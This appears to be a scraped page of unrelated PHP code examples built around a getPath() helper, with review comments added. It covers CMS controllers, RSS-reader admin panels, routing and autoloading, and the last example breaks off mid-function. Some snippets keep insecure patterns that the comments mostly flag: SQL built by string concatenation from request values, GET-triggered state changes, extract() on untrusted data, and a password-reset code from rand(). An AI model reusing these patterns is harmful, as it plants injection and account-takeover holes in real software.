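/**
 * Build the page content for the CMS controller.
 *
 * Depending on $this->display this renders the category form, the page form,
 * or (default) the category breadcrumb followed by the category list and the
 * page list. The accumulated HTML is assigned to Smarty as `content`.
 */
public function initContent()
 {
     $this->initTabModuleList();
     $this->renderPageHeaderToolbar();
     // Both sub-controllers share this controller's token.
     $this->admin_cms_categories->token = $this->token;
     $this->admin_cms->token = $this->token;
     if ($this->display == 'edit_category') {
         $this->content .= $this->admin_cms_categories->renderForm();
     } elseif ($this->display == 'edit_page') {
         $this->content .= $this->admin_cms->renderForm();
     } elseif ($this->display == 'view_page') {
         // Nothing is rendered for 'view_page'; the branch only held a placeholder.
     } else {
         // The request value is cast to int; 0 (missing or non-numeric) falls back to category 1.
         $id_cms_category = (int) Tools::getValue('id_cms_category');
         if (!$id_cms_category) {
             $id_cms_category = 1;
         }
         // CMS categories breadcrumb
         $cms_tabs = array('cms_category', 'cms');
         // Strip each tab's ordering parameters from the breadcrumb base URL.
         // The subject is the running $cat_bar_index (not self::$currentIndex),
         // so the cleanup done for one tab is kept when the next tab also matches.
         $cat_bar_index = self::$currentIndex;
         foreach ($cms_tabs as $tab) {
             if (Tools::getValue($tab . 'Orderby') && Tools::getValue($tab . 'Orderway')) {
                 $cat_bar_index = preg_replace('/&' . $tab . 'Orderby=([a-z _]*)&' . $tab . 'Orderway=([a-z]*)/i', '', $cat_bar_index);
             }
         }
         $this->context->smarty->assign(array(
             'cms_breadcrumb' => getPath($cat_bar_index, $id_cms_category, '', '', 'cms'),
             'page_header_toolbar_btn' => $this->page_header_toolbar_btn,
             'page_header_toolbar_title' => $this->toolbar_title,
         ));
         $this->content .= $this->admin_cms_categories->renderList();
         $this->admin_cms->id_cms_category = $id_cms_category;
         $this->content .= $this->admin_cms->renderList();
     }
     $this->context->smarty->assign(array('content' => $this->content));
 }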
Example #2
/**
 * Return the URL of the current feed.
 *
 * When `rss.output.usemodrewrite` is set, the feed's escaped title is used as
 * a path segment; otherwise the URL points at feed.php with the channel id.
 */
function rss_feed_url()
{
    $useRewrite = getConfig('rss.output.usemodrewrite');
    $base = getPath();
    $feed = $GLOBALS['rss']->currentFeed;

    return $useRewrite
        ? $base . $feed->escapedTitle . "/"
        : $base . "feed.php?channel=" . $feed->cid;
}
 /**
  * Load app/Mage.php from the directory getPath() resolves and start Mage::app().
  *
  * Does nothing when the bootstrap file is not present.
  *
  * @param string $code Passed through to Mage::app().
  */
 function initMage($code = '')
 {
     // $path keeps its name: the included file runs in this function's scope.
     $path = getPath(dirname(__FILE__), 3);
     $bootstrap = $path . '/app/Mage.php';
     if (!file_exists($bootstrap)) {
         return;
     }
     include_once $bootstrap;
     Mage::app($code);
 }
Example #4
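 /**
  * Print the <link> tag for the base stylesheet, then one <link> per row of
  * the `css` table whose pid matches this object's id.
  */
 function print_styles()
 {
     echo '<link href="' . getPath() . '/style.css" rel="stylesheet">';
     global $con;
     // pid is compared unquoted, so the id is forced to an integer before it
     // reaches the SQL text; nothing but digits can end up in the query.
     $result = mysqli_query($con, "SELECT css FROM css WHERE pid = " . (int) $this->id);
     if ($result === false) {
         // Query failed: the base stylesheet has been printed, there is nothing else to add.
         return;
     }
     while ($row = mysqli_fetch_array($result)) {
         // The stored file name is data, not markup: escape it for the attribute context.
         echo '<link href="' . getPath() . '/' . htmlspecialchars($row['css'], ENT_QUOTES) . '" rel="stylesheet">';
     }
     mysqli_free_result($result);
 }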
/**
 * Resolve $page to a file through getPath() and the global $menu, include
 * that file and return the rendered document.
 *
 * An empty result from getPath() is handed to pageNotFound().
 */
function getPage($page)
{
	global $menu;

	// $p keeps its name: the included file runs in this function's scope.
	$p = getPath($page, $menu);
	if ($p == "") {
		return pageNotFound($page);
	}

	// NOTE(review): the resolved file is executed as PHP. getPath() is not
	// visible here - confirm it can only return files that $menu lists.
	include($p);

	return html(head() . view());
}
Example #6
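/**
 * Render the admin "Themes" panel and handle theme switching.
 *
 * A `theme` query parameter that names a known theme is written to the
 * `rss.output.theme` config row; otherwise the configured theme is read.
 * The function then prints the "Check for Updates" form and one frame per
 * theme returned by getThemes().
 */
function themes()
{
    $themes = getThemes();
    // The requested theme must be a key of getThemes() before it is used.
    // NOTE(review): this state change is triggered by a GET parameter and no
    // anti-CSRF token is checked in this function - confirm the caller does so.
    if (isset($_GET['theme']) && array_key_exists($_GET['theme'], $themes)) {
        $active_theme = sanitize($_GET['theme'], RSS_SANITIZER_SIMPLE_SQL | RSS_SANITIZER_NO_SPACES);
        $sql = "update " . getTable('config') . " set value_ = '{$active_theme}'" . " where key_='rss.output.theme'";
        rss_query($sql);
        rss_invalidate_cache();
    } else {
        $active_theme = getConfig('rss.output.theme');
    }
    // PHP_SELF reflects the request path, so it is escaped before it is placed in an attribute.
    echo "<form style=\"float:right\" method=\"post\" action=\"" . htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) . "\">\n" . "<p><input type=\"hidden\" name=\"" . CST_ADMIN_DOMAIN . "\" value=\"" . CST_ADMIN_DOMAIN_THEMES . "\" />\n" . "<input type=\"submit\" name=\"admin_themes_check_for_updates\" value=\"" . __('Check for Updates') . "\" /></p>\n" . "</form>\n";
    if (isset($_POST['admin_themes_check_for_updates'])) {
        theme_getThemesUpdate($themes);
    }
    echo "<h2 class=\"trigger\">" . __('Themes') . "</h2>\n" . "<div id=\"admin_themes\" >\n";
    echo __('<p style="font-size:small">Themes are made of a set of template files which specify how your Gregarius installation looks.<br />More themes can be downloaded from the <a style="text-decoration:underline"  href="http://themes.gregarius.net/">Themes Repository</a>.</p>');
    foreach ($themes as $entry => $theme) {
        // NOTE(review): extract() turns every key of the theme record into a local
        // variable and can overwrite locals of this function. The record's fields
        // (name, url, author, description, ...) are printed below without escaping;
        // confirm where getThemes() reads them from and whether that source is trusted.
        extract($theme);
        if (!$name) {
            $name = $entry;
        }
        if ($url) {
            $author = "<a href=\"{$url}\">{$author}</a>";
        }
        $active = $entry == $active_theme;
        $updateAvailable = isset($theme['updateVersion']);
        if ($screenshot) {
            $screenshotURL = "<img src=\"" . getPath() . RSS_THEME_DIR . "/{$fsname}/{$screenshot}\"  />";
        } else {
            $screenshotURL = "<img src=\"" . getPath() . RSS_THEME_DIR . "/default/media/noscreenshot.png\" />";
        }
        $h4 = "{$name}";
        $h5 = "By&nbsp;{$author} | Version:&nbsp;{$version}";
        if ($updateAvailable) {
            $h5 .= ' | <a class="update" href="' . $theme['updateUrl'] . '">Update to version ' . $theme['updateVersion'] . '</a>';
        }
        if ($htmltheme) {
            $seturl = "index.php?view=themes&amp;theme={$entry}";
        } else {
            $seturl = "";
        }
        echo "<div class=\"themeframe" . ($active ? " active" : "") . ($updateAvailable ? " hilite" : "") . "\"><span>";
        if (!$active && $htmltheme) {
            echo "<a href=\"{$seturl}\" class=\"bookmarklet\">" . __('Use this Theme') . "</a>";
        } elseif ($active) {
            echo "<p class=\"bookmarklet\">" . __('Active Theme') . "</p>";
        }
        echo "<h4>{$h4}</h4>\n";
        if (file_exists("../" . RSS_THEME_DIR . "/{$fsname}/config.php")) {
            echo "<a class=\"bookmarklet\" href=\"" . htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) . "?" . CST_ADMIN_DOMAIN . "=" . CST_ADMIN_DOMAIN_THEME_OPTIONS . "&amp;theme=" . $entry . "&amp;" . CST_ADMIN_VIEW . "=" . CST_ADMIN_DOMAIN_THEME_OPTIONS . "\">" . __('Configure') . "</a>";
        }
        echo "<h5>{$h5}</h5>\n" . "<p class=\"themescreenshot\">{$screenshotURL}</p>" . "<p>{$description}</p>&nbsp;" . "</span></div>\n";
    }
    echo "</div>\n";
}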
Example #7
 /**
  * Render the sitemap view with $this->data and write the result to
  * public/sitemap.xml and public/sitemap.xml.gz below APP.
  */
 function render()
 {
     $xml = View::do_fetch(getPath('views/main/sitemap.php'), $this->data);
     // Target file => mode handed to writeFile(). 'w9' is used for the .gz file;
     // presumably a gzip write mode - writeFile() is not visible here.
     $targets = array(
         'public/sitemap.xml' => 'w',
         'public/sitemap.xml.gz' => 'w9',
     );
     foreach ($targets as $file => $mode) {
         writeFile(APP . $file, $xml, $mode);
     }
 }
/**
 * Legacy autoload hook: load the file that getPath() returns for $class_name.
 *
 * __autoload() was deprecated in PHP 7.2 and removed in PHP 8.0;
 * spl_autoload_register() is the supported replacement.
 *
 * @return bool true when the file exists and was loaded, false otherwise.
 */
function __autoload($class_name)
{
    // $path keeps its name: the required file runs in this function's scope.
    $path = getPath($class_name);
    if (!file_exists($path)) {
        // NOTE(review): the resolved filesystem path is written to the response
        // here; consider logging it instead of showing it to the client.
        echo "Class not found: " . $path;
        return false;
    }
    require_once $path;
    return true;
}
Example #9
 /**
  * Fetch every row of `pages` whose date contains $this->data['date'] and
  * append each one, tagged with the archive body view, to $this->data['body'].
  */
 function requestAllPages()
 {
     $page = new Page();
     $page->tablename = "pages";
     // NOTE(review): the date value is concatenated into the WHERE fragment as-is.
     // Where $this->data['date'] comes from is not visible here; if it can be
     // request-controlled it needs escaping or a bound parameter (check what
     // retrieve_many() supports).
     $where = "date LIKE '%" . $this->data['date'] . "%'";
     $pages = $page->retrieve_many($where);
     $view = getPath('views/archives/body.php');
     foreach ($pages as $row) {
         $row['view'] = $view;
         $this->data['body'][] = $row;
     }
 }
Example #10
/**
 * Print the "Export OPML" form.
 *
 * With `rss.output.usemodrewrite` set the form posts to <path>opml,
 * otherwise it sends a GET request to <path>opml.php.
 */
function opml_export_form()
{
    $rewrite = getConfig('rss.output.usemodrewrite');
    $method = $rewrite ? "post" : "get";
    $action = getPath() . ($rewrite ? "opml" : "opml.php");

    echo '<fieldset style="vertical-align:top">' . "\n" . '<legend>' . __('Export OPML:') . "</legend>\n";
    echo '<form method="' . $method . '" action="' . $action . '">' . "\n"
        . '<p><label for="action">' . __('Export OPML:') . "</label>\n"
        . '<input type="submit" name="act" id="action" value="' . __('Export') . '" />'
        . "</p>\n</form>\n"
        . "</fieldset>\n";
}
Example #11
 /**
  * PHP4-style constructor: register the Home, Refresh (unless
  * `rss.config.restrictrefresh` is set), Search and Admin items, append the
  * output of the `rss.plugins.afternav` hook, publish this object as
  * $GLOBALS['rss']->nav and fire the `rss.plugins.navelements` hook.
  */
 function Navigation()
 {
     $this->appendNavItem(getPath(), __('<span>H</span>ome'), LOCATION_HOME);

     $refreshRestricted = getConfig("rss.config.restrictrefresh");
     if (!$refreshRestricted) {
         $this->appendNavItem(getPath() . 'update.php', __('<span>R</span>efresh'), LOCATION_UPDATE);
     }

     $this->appendNavItem(getPath() . 'search.php', __('<span>S</span>earch'), LOCATION_SEARCH);
     $this->appendNavItem(getPath() . 'admin/', __('A<span>d</span>min'), LOCATION_ADMIN);

     // Plugin output is appended to the post-render buffer unchanged.
     $afterNav = rss_plugin_hook('rss.plugins.afternav', null);
     if ($afterNav != null) {
         $this->postRender .= $afterNav;
     }

     $GLOBALS['rss']->nav = $this;
     rss_plugin_hook('rss.plugins.navelements', null);
 }
Example #12
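/**
 * Build the breadcrumb trail for a `shop` row by following s_parent upwards.
 *
 * Every visited row is appended to $ret as array(s_title, s_rowID). The walk
 * stops at a row without a parent, at a missing row, or when an id repeats
 * (a parent cycle); array("Shop", "") is appended last in every case.
 *
 * @param array $ret    Trail collected so far; entries are appended to it.
 * @param mixed $id     s_rowID of the row to start from.
 * @param mixed $mysqli Connection object offering prepare().
 * @return array The trail, from the starting row up to the "Shop" root entry.
 * @throws RuntimeException When the statement cannot be prepared.
 */
function getPath(array $ret, $id, $mysqli)
{
    // The id is bound as a parameter, never interpolated into the SQL text.
    $stmt = $mysqli->prepare("SELECT * FROM shop WHERE s_rowID = ?");
    if (!$stmt) {
        throw new RuntimeException('Could not prepare the shop lookup statement.');
    }

    $current = (string) $id;
    // Bound by reference: changing $current and re-executing looks up the next row.
    $stmt->bind_param('s', $current);

    $seen = array();
    while (!isset($seen[$current])) {
        // Remember visited ids so a parent cycle cannot loop forever.
        $seen[$current] = true;
        $stmt->execute();
        $result = $stmt->get_result();
        $obj = $result ? $result->fetch_object() : null;
        if (!$obj) {
            // Unknown id: end the trail instead of reading properties of null.
            break;
        }
        $ret[] = array($obj->s_title, $obj->s_rowID);
        if ($obj->s_parent == "") {
            break;
        }
        $current = (string) $obj->s_parent;
    }
    $stmt->close();

    $ret[] = array("Shop", "");
    return $ret;
}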
Example #13
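/**
 * Read KEY=VALUE lines from /etc/profile.d/werm.sh and publish each value,
 * passed through getPath(), in $_ENV.
 *
 * A missing, unreadable or empty file leaves $_ENV untouched.
 */
function env_CFG()
{
    // Start from an empty map so the loops below are safe when nothing matches.
    $env = array();
    $file = "/etc/profile.d/werm.sh";
    $content = is_readable($file) ? file_get_contents($file) : '';
    // One match per line: everything before the first '=' is the key, the rest is the value.
    preg_match_all("/(.*?)=(.*?)\$/m", (string) $content, $match, PREG_SET_ORDER);
    foreach ($match as $pair) {
        $env[$pair[1]] = $pair[2];
    }
    foreach ($env as $key => $value) {
        $_ENV[$key] = getPath($value, $env);
    }
}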
Example #14
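 /**
  * Render the front-office index template with a CSRF token for the
  * "authenticate" intention and the Media entity whose id is '31'.
  */
 public function indexAction()
 {
     if ($this->has('security.csrf.token_manager')) {
         $csrfToken = $this->get('security.csrf.token_manager')->getToken('authenticate')->getValue();
     } else {
         // BC for SF < 2.4
         $csrfToken = $this->has('form.csrf_provider') ? $this->get('form.csrf_provider')->generateCsrfToken('authenticate') : null;
     }
     $em = $this->getDoctrine()->getManager();
     $media = $em->getRepository('SiteBackOfficeBundle:Media')->findOneById('31');
     // No var_dump()/die before rendering: a debug dump at this point sent entity
     // internals to the client and made the render call unreachable.
     return $this->render('SiteFrontOfficeBundle:Default:index.html.twig', array('csrf_token' => $csrfToken, 'media' => $media));
 }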
Example #15
 /**
  * Return the pages whose `tags` column contains the tag named in $path,
  * each tagged with the tag body view.
  *
  * @param string $path Request path; a leading "tag/" is removed to get the tag.
  * @return array List of page rows with an added 'view' entry.
  */
 public static function getBody($path)
 {
     // Author's TODO: replace the string $path with a proper params array.
     $tag = preg_replace('#^tag/#', '', $path);
     $page = new Page();
     $page->tablename = "pages";
     // NOTE(review): $tag is taken from the path and concatenated into the WHERE
     // fragment without escaping; it should be escaped or bound before it reaches
     // SQL (check what retrieve_many() supports - it is not visible here).
     $where = "tags like '%" . $tag . "%'";
     $pages = $page->retrieve_many($where);
     $view = getPath('views/tag/body.php');
     $items = array();
     foreach ($pages as $row) {
         $row['view'] = $view;
         $items[] = $row;
     }
     return $items;
 }
Example #16
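/**
 * Fetch $path through $dbxClient into a temporary file and store it under
 * the local "downloads" directory unless a file already exists there.
 *
 * An empty path, or one that could leave the downloads directory, redirects
 * to getPath("") and ends the request.
 *
 * @param object $dbxClient Client offering getFile($path, $stream).
 * @param string $path      Remote path, expected to start with "/".
 */
function downloadFile($dbxClient, $path)
{
    // The path is appended to "downloads", so ".." segments and NUL bytes are
    // refused before anything is fetched or written.
    $unsafe = $path && (preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $path) || strpos($path, "\0") !== false);
    if (!$path || $unsafe) {
        header("Location: " . getPath(""));
        exit;
    }
    $fd = tmpfile();
    $dbxClient->getFile($path, $fd);
    // Rewind so the write below copies the stream from its beginning.
    fseek($fd, 0);
    $downloadPath = 'downloads' . $path;
    if (!file_exists($downloadPath)) {
        file_put_contents($downloadPath, $fd);
    }
    fclose($fd);
}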
Example #17
/**
 * Dispatch the current request.
 *
 * An empty path renders the 'index' page. Otherwise a matching file under
 * assets/ is rendered, the path is handed to the Router, and when the Router
 * throws ModelExistenceException the PageEngine renders the path as a page.
 */
function routeRequest()
{
    $requestPath = getPath();
    if (!$requestPath) {
        return PageEngine::renderPage('index');
    }

    // NOTE(review): the request path is joined to "assets/" as-is; confirm that
    // getPath() or File::find() rejects ".." segments. Also, File::render() is
    // not followed by a return, so routing continues below unless File::render()
    // ends the request itself.
    $asset = "assets/" . $requestPath;
    if (File::find($asset)) {
        File::render($asset);
    }

    try {
        $router = new Router();
        return $router->route($requestPath);
    } catch (ModelExistenceException $e) {
        return PageEngine::renderPage($requestPath);
    }
}
Example #18
 /**
  * Work out which page the request addresses.
  *
  * The `path` query parameter wins; otherwise the page is derived from the
  * script's directory relative to getPath(""). A trailing "/index.php" and a
  * leading "/content" are removed, and the result is returned only when
  * Page::isPage() accepts it.
  *
  * @param string $defaultPage Page returned when nothing valid was requested.
  * @return string
  */
 public static function getCurrentPage($defaultPage = "/home")
 {
     $candidate = $defaultPage;
     if (array_key_exists("path", $_GET)) {
         // Request-supplied value; it is only returned if Page::isPage() accepts it.
         $candidate = $_GET["path"];
     } elseif (strstr($_SERVER["SCRIPT_FILENAME"], getPath(""))) {
         $scriptDir = dirname($_SERVER["SCRIPT_FILENAME"]);
         $candidate = "/" . str_replace(getPath(""), "", $scriptDir);
     }

     // Patterns are applied in order: trailing "/index.php", then leading "/content".
     $candidate = preg_replace(array("/\\/index\\.php\$/", "/^\\/content/"), "", $candidate);

     return Page::isPage($candidate) ? $candidate : $defaultPage;
 }
Example #19
 /**
  * PHP4-style constructor for the page header.
  *
  * Stores the title and options, optionally appends the unread count to the
  * document title, prepares the auto-refresh redirect, collects the <link>
  * entries and JavaScript files, and installs the side menu on $GLOBALS['rss'].
  *
  * @param string     $title        Raw page title.
  * @param int        $active       1 enables the auto-refresh redirect check.
  * @param array|null $cidfid       When an array, its 'cid' and 'fid' entries feed getUnreadCount().
  * @param string     $onLoadAction Stored as-is.
  * @param mixed      $options      Stored as-is (defaults to HDR_NONE).
  * @param array|null $links        Extra links: rel => array('title' => ..., 'href' => ...).
  */
 function Header($title = "", $active = 0, $cidfid = null, $onLoadAction = "", $options = HDR_NONE, $links = NULL)
 {
     _pf('Header() ctor');
     $this->docTitle = $title;
     $this->rawTitle = $title;
     $this->active = $active;
     $this->cidfid = $cidfid;
     $this->onLoadAction = $onLoadAction;
     $this->options = $options;
     $this->extraHeaders = array();
     $this->docTitle = makeTitle($title);

     if (getConfig("rss.output.titleunreadcnt") && is_array($cidfid)) {
         $unread = getUnreadCount($cidfid['cid'], $cidfid['fid']);
         if ($unread) {
             $this->docTitle .= " ({$unread} " . __('unread') . ")";
         }
     }

     if ($active == 1 && MINUTE * getConfig('rss.config.refreshafter') >= 40 * MINUTE) {
         // NOTE(review): the redirect target is assembled from the request's Host
         // header and PHP_SELF. Where redirectUrl is emitted is not visible here;
         // confirm the host is validated and the value escaped at that point.
         $target = guessTransportProto() . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']);
         if (substr($target, -1) != "/") {
             $target .= "/";
         }
         $this->redirectUrl = $target . "update.php";
         $this->redirectTimeout = MINUTE * getConfig('rss.config.refreshafter');
     }

     $this->links = array(
         array('start', 'Home', getPath()),
         array('search', 'Search', getPath() . "search.php"),
         array('tags', 'Tags', getPath() . (getConfig('rss.output.usemodrewrite') ? "tag/" : "tags.php?alltags")),
     );
     if ($links != NULL) {
         foreach ($links as $rel => $link) {
             $this->links[] = array($rel, $link['title'], $link['href']);
         }
     }

     $this->javascriptFiles[] = getPath() . "ajax.php?js";
     $this->javascriptFiles[] = getPath() . "extlib/md5.js";
     if (getConfig('rss.output.channelcollapse')) {
         $this->javascriptFiles[] = getPath() . "extlib/fcollapse.js";
     }

     // The menu is addressed through $GLOBALS each time rather than through a
     // local variable, exactly as the constructor has always done.
     $GLOBALS['rss']->sideMenu = new SideMenu();
     $GLOBALS['rss']->sideMenu->addMenu(__('Feeds'), 'FeedList', "_side('FeedList')");
     $GLOBALS['rss']->sideMenu->addMenu(__('Categories'), 'CatList', "_side('CatList')");
     $GLOBALS['rss']->sideMenu->addMenu(__('Tags'), 'TagList', "_side('TagList')");
 }
Example #20
 /**
  * Load the configuration as array(table => array(key => value)).
  *
  * Side effects: a row whose key is already present for its table is deleted
  * through Config::delete() when it has an id, and any table for which neither
  * a plugin config file nor a controller file is found is dropped from the
  * result and passed to $this->unregister().
  *
  * @return array|false false when get_tables() does not return an array.
  */
 function getConfig()
 {
     $table_rows = $this->get_tables();
     if (!is_array($table_rows)) {
         return false;
     }

     $config = array();
     foreach ($table_rows as $table => $rows) {
         if (!array_key_exists($table, $config)) {
             $config[$table] = array();
         }
         foreach ($rows as $row) {
             if (!array_key_exists($row['key'], $config[$table])) {
                 // First occurrence of the key wins.
                 $config[$table][$row['key']] = $row['value'];
                 continue;
             }
             // Duplicate key: remove the stored row when it can be addressed by id.
             if ($row['id']) {
                 $duplicate = new Config($row['id'], $table);
                 $duplicate->delete();
             }
         }
     }

     // Keep only the types that still have a plugin config or a controller.
     foreach (array_keys($config) as $type) {
         $is_plugin = getPath($type . "/bin/config.php");
         $is_controller = getPath("controllers/" . $type . ".php");
         if ($is_plugin || $is_controller) {
             continue;
         }
         unset($config[$type]);
         $this->unregister($type);
     }

     return $config;
 }
Example #21
/**
 * Print a minimal HTML login page for mobile clients, flush the output and
 * end the request.
 *
 * The form posts `username`, `password`, `login` and a hidden `media=mobile`
 * field to the URL returned by getPath().
 */
function mobileLoginForm()
{
    ?>
<html><head><title>Login</title></head>
<body>
<form method="post" action="<?php 
    // NOTE(review): getPath() is printed into the attribute without escaping;
    // confirm it cannot contain request-derived characters. The form carries no
    // anti-CSRF token - whether the handler needs one is not visible here.
    echo getPath();
    ?>
">
<p><input type="hidden" name="media" value="mobile" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" value="" /></p>
<p><label for="password">Password:</label>
<input type="password" name="password" id="password"  value="" /></p>
<p><input type="submit" name="login" value="Go" /></p>
</form>
</body>
</html>
<?php 
    // Send the page now and stop; nothing after this function call runs.
    flush();
    exit;
}
Example #22
/**
 * Return the navigation bar markup, with every link prefixed by getPath().
 *
 * @return string HTML of the <nav> element.
 */
function getNavbar()
{
    // The prefix is inserted into href attributes unescaped, as getPath() returns it.
    $base = getPath();
    $html = '<nav class="navbar navbar-default" role="navigation">
	  <div class="container-fluid">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
		  <a class="navbar-brand" href="' . $base . '">NTNU Gløshaugen</a>
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
		  <ul class="nav navbar-nav">
			<li><a href="' . $base . '/pages/gamlefysikk.php">Gamle Fysikk</a></li>
			<li><a href="' . $base . '/pages/hovedbygget.php">Hovedbygget</a></li>
			<li><a href="' . $base . '/pages/itbygget.php">IT-bygget</a></li>
			<li><a href="' . $base . '/pages/p15.php">P15</a></li>
			<li><a href="' . $base . '/pages/realfagsbygget.php">Realfagsbygget</a></li>
		  </ul>
		</div>
	  </div>
	</nav>';

    return $html;
}
Example #23
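/**
 * Map a request URL to a controller, load its file and return its class name.
 *
 * The first path segment after WEB_FOLDER names the controller; it is only
 * accepted when it consists of letters, digits, '_', '-' and '.'. When no
 * usable controller is found, DEFAULT_ROUTE is used if it is defined.
 *
 * @param string $url Request URL/path.
 * @return string|null CamelCased controller name, or null when no controller file is known.
 */
function findController($url)
{
    // Local names are kept as they are: the required controller file runs in
    // this function's scope and can see them.

    // first remove the website path from the URL; preg_quote() escapes regex
    // metacharacters and the '#' delimiter, so WEB_FOLDER is matched literally
    $requri = preg_replace('#^' . preg_quote(WEB_FOLDER, '#') . '#', '', $url);
    // now split the path into two parts - the first is the controller, the second its parameters
    preg_match('#^([^/]+)/?(.*)$#', $requri, $matches);
    // remove the last match if it is empty
    if (isset($matches[count($matches) - 1]) && $matches[count($matches) - 1] == '') {
        array_pop($matches);
    }
    // The first match is the controller. The character whitelist excludes '/',
    // so the name cannot add directory components to the file path built below.
    $controller = isset($matches[1]) && preg_match('#^[A-Za-z0-9_\\-\\.]+$#', $matches[1]) && !empty($matches[1]) ? $matches[1] : false;
    // resolve the controller file
    $controllerfile = getPath('controllers/' . $controller . '.php');
    // fall back to the default controller when the name was rejected or the file is missing
    if (!$controller || !file_exists($controllerfile)) {
        if (defined("DEFAULT_ROUTE")) {
            $controller = DEFAULT_ROUTE;
            $controllerfile = getPath('controllers/' . $controller . '.php');
        }
    }
    if (!empty($controllerfile)) {
        // set the controller name as a constant for later use (only the first time)
        if (!defined("CONTROLLER")) {
            define("CONTROLLER", $controller);
        }
        // NOTE(review): reached whenever $controllerfile is non-empty, even if the
        // file does not exist; require then fails with a fatal error. What getPath()
        // returns for a missing file is not visible here.
        require $controllerfile;
        // CamelCase the controller name and drop '.' and '-'
        $controller = str_replace(" ", "", ucwords(preg_replace("/\\.|\\-/", " ", $controller)));
        return $controller;
    }
}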
Example #24
?>
			</div>
			<div id="content-wrapper">
				<div id="content" class="home">
					<?php 
// Render the "Main" placeholder for $PAGE inside the content column.
LayoutHelper::renderPlaceHolder($PAGE, "Main");
?>
				</div>
				<div id="side">
					<?php 
// Render the "Side" placeholder for $PAGE inside the side column.
LayoutHelper::renderPlaceHolder($PAGE, "Side");
?>
				</div>
				<div class="clear-hidden"></div>
			</div>
			<div id="footer">
				<?php 
// Fixed, relative include: resolved against the include path / working directory.
include "includes/footer.php";
?>
				<a href="http://www.jozza.net/content/home/projects/structure-cms/"><img src="<?php 
// NOTE(review): the return value of getPath("") is discarded. Unless getPath()
// prints the path itself, the <img> src is just "/structurecms-logo.gif" -
// confirm whether an echo is missing here.
getPath("");
?>
/structurecms-logo.gif" border="0" alt="&copy; Created using StructureCMS" title="&copy; Created using StructureCMS"></a>
				<div class="clear-hidden"></div>
			</div>
		</div>
	</div>
</body>

</html>
Example #25
 $sql = "SELECT nUserId , vUserName , vEmail , vLogin , vPassword FROM sptbl_users  ";
 $sql .= " WHERE vEmail = '" . mysql_real_escape_string($useremail) . "' ";
 $result = executeSelect($sql, $conn);
 if (mysql_num_rows($result) > 0) {
     $row = mysql_fetch_array($result);
     $userid = $row["nUserId"];
     $username = $row["vLogin"];
     $useremail = $row["vEmail"];
     $userfullname = $row["vUserName"];
     $code = rand(1, 999999);
     $sql = "UPDATE sptbl_users  ";
     $sql .= " SET vCodeForPass = '******' WHERE nUserId = '" . $userid . "' ";
     //echo $sql;
     $result = executeSelect($sql, $conn);
     //$path = substr($thisfile,0,)
     $link = getPath() . "/resetpass.php?action=resetpass&code=" . $code;
     $message = true;
     /*****************************************************************************/
     $sql = " Select * from sptbl_lookup where vLookUpName IN('Post2PostGap','MailFromName','MailFromMail',";
     $sql .= "'MailReplyName','MailReplyMail','Emailfooter','Emailheader','AutoLock','HelpdeskTitle')";
     $result = executeSelect($sql, $conn);
     if (mysql_num_rows($result) > 0) {
         while ($row = mysql_fetch_array($result)) {
             switch ($row["vLookUpName"]) {
                 case "MailFromName":
                     $var_fromName = $row["vLookUpValue"];
                     break;
                 case "MailFromMail":
                     $var_fromMail = $row["vLookUpValue"];
                     break;
                 case "MailReplyName":
Example #26
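/**
 * Admin "Tags" panel: dispatch the requested tag action, then print the tag table.
 *
 * Actions (from the meta-action request field, else `action`): edit, delete
 * (single with confirmation, or multi-select via `me_delete`) and rename.
 *
 * @return void
 */
function tags()
{
    // Fix for #16: Admin (et al.) should not rely on l10n labels for actions:
    // Look for a meta-action first, which should be the (untranslated) *name* of
    // the (translated) action constant.
    // Fixme: should replace 'action's with a constant
    if (array_key_exists(CST_ADMIN_METAACTION, $_REQUEST)) {
        $__action__ = $_REQUEST[CST_ADMIN_METAACTION];
    } elseif (array_key_exists('action', $_REQUEST)) {
        $__action__ = $_REQUEST['action'];
    } else {
        $__action__ = "";
    }
    // Always defined, so the branches below never read an unset variable.
    // NOTE(review): $tid is placed unquoted into SQL below; that is only safe if
    // sanitize(..., RSS_SANITIZER_NUMERIC) returns digits only - confirm.
    $tid = null;
    if (isset($_REQUEST['id'])) {
        $tid = sanitize($_REQUEST['id'], RSS_SANITIZER_NUMERIC);
    }
    // PHP_SELF reflects the request path; escape it once for use in attributes.
    $self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES);
    $ret__ = CST_ADMIN_DOMAIN_TAGS;
    switch ($__action__) {
        case CST_ADMIN_EDIT_ACTION:
            tag_edit($tid);
            $ret__ = CST_ADMIN_DOMAIN_NONE;
            break;
        case CST_ADMIN_DELETE_ACTION:
            // NOTE(review): the deletes below rely on the confirmation fields only;
            // no anti-CSRF token is checked in this function - confirm the caller does so.
            if (array_key_exists(CST_ADMIN_CONFIRMED, $_POST) && $_POST[CST_ADMIN_CONFIRMED] == __('Yes')) {
                $sql = "delete from " . getTable("tag") . " where id={$tid}";
                rss_query($sql);
                $sql = "delete from " . getTable("metatag") . " where tid={$tid}";
                rss_query($sql);
                rss_invalidate_cache();
            } elseif (array_key_exists(CST_ADMIN_CONFIRMED, $_REQUEST) && $_REQUEST[CST_ADMIN_CONFIRMED] == __('No')) {
                // nop;
            } elseif (array_key_exists('me_delete', $_REQUEST)) {
                if (array_key_exists('me_do_delete', $_REQUEST) && "1" == $_REQUEST['me_do_delete']) {
                    // Only positive integers from fields named tcb<digits> reach the IN (...) list.
                    $ids = array();
                    foreach ($_REQUEST as $key => $val) {
                        if (preg_match('/^tcb([0-9]+)$/', $key, $match)) {
                            if (($id = (int) $_REQUEST[$key]) > 0) {
                                $ids[] = $id;
                            }
                        }
                    }
                    if (count($ids) > 0) {
                        $sql = "delete from " . getTable("tag") . " where id in (" . implode(',', $ids) . ")";
                        rss_query($sql);
                        $sql = "delete from " . getTable("metatag") . " where tid in (" . implode(',', $ids) . ")";
                        rss_query($sql);
                        rss_invalidate_cache();
                    }
                }
            } else {
                list($tname) = rss_fetch_row(rss_query("select tag from " . getTable("tag") . " where id = {$tid}"));
                echo "<form class=\"box\" method=\"post\" action=\"" . $self . "\">\n" . "<p class=\"error\">";
                // The tag name is stored data: escape it, as the table below does.
                printf(__("Are you sure you wish to delete '%s'?"), htmlspecialchars((string) $tname));
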